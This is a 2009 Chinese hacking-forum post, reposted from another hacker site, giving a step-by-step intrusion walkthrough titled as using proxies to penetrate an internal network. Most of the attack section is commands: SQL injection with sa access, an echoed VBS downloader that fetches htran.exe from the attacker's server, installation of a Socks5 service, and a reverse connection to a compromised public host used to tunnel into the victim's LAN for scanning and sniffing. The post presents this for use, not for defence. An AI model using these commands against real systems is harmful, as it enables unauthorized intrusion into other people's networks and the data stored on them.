WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 1600查看
  • 0回复

[经验分享] 妙用代理渗透内网

主题

好友

1254

积分

金牌会员

发表于 2009-7-10 01:37:50 |显示全部楼层
正文
代理在入侵里的作用-----妙用代理,渗透内网
一、踩点
主机: http://www.baidu.com/
OS:Windows 2000 + IIS 5.0 + MSSQL
端口:80 21
数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.
首页存在注入漏洞,sa登陆.
注入点:
http://www.baidu.com/list.asp?id=1
二、入侵思路
    1.给内网目标机装个代理服务器
    2.把弄好的那个代理端口映到公网.
    3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。
    4.接下来就是找共享,嗅探,社会工程学等等了。
三、入侵准备
    1.公网肉鸡一只:218.3.1.1
    2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。
    3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网)
    4.A:192.168.1.2  B:218.3.1.1  C:www.baidu.com  D:192.168.0.25
四、入侵进行时
    1.工具上传:
  在nbsi下执行:
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs
  然后下载工具:
  cscript down.vbs http://IP/htran.exe htran.exe  //到我的空间下载htran.exe
    2.安装Socks5服务
  在nbsi下执行:
htran.exe -install  //安装Socks5服务
htran.exe -start    //启动Socks5服务
    3.反弹进行时
在B上运行:  htran.exe -s -listen 520 5200  //监听端口
在nbsi下执行:htran.exe -s -connect 218.3.1.1 520
    3.进入内网
现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网。
五、渗透内网
  接下来就可以扫描,嗅探,等等,也就是后话了。
六、总结
  文章技术性不高,有错的地方希望高手指出,偶是菜鸟,也希望这篇文章对大家有所帮助。

偶的朋友可以在我的qq硬盘里面下载动画。在我的个人文章里面。
本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处:http://www.520hack.com/Article/Text2/200812/12470.html

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-17 22:21 , Processed in 0.067837 second(s), 16 queries .

返回顶部